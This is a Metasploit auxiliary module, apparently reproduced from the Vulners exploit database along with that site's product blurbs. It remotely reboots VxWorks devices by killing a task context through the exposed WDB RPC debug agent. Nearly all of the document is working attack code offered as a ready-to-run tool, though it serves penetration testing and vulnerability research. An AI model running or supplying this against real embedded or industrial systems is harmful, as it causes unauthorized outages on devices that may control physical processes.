`##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Auxiliary
include Msf::Exploit::Remote::WDBRPC_Client
include Msf::Auxiliary::Report
include Msf::Auxiliary::Scanner
def initialize(info = {})
super(update_info(info,
'Name' => 'VxWorks WDB Agent Remote Reboot',
'Description' => %q{
This module provides the ability to reboot a VxWorks target through WDBRPC
},
'Author' => [ 'hdm'],
'License' => MSF_LICENSE,
'References' =>
[
['OSVDB', '66842'],
['URL', 'https://www.rapid7.com/blog/post/2010/08/02/new-vxworks-vulnerabilities/'],
['US-CERT-VU', '362332']
],
'Actions' =>
[
['Reboot', 'Description' => 'Reboot target']
],
'DefaultAction' => 'Reboot'
))
register_options(
[
OptInt.new('CONTEXT', [ true, "The context to terminate (0=system reboot)", 0 ])
])
end
def run_host(ip)
wdbrpc_client_connect
membase = @wdbrpc_info[:rt_membase]
memsize = @wdbrpc_info[:rt_memsize]
mtu = @wdbrpc_info[:agent_mtu]
ctx = datastore['CONTEXT'].to_i
print_status("#{ip} - Killing task context #{ctx}...")
wdbrpc_client_context_kill( (ctx != 0) ? 3 : 0, ctx )
print_status("#{ip} - Done")
wdbrpc_client_disconnect
end
end
`
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation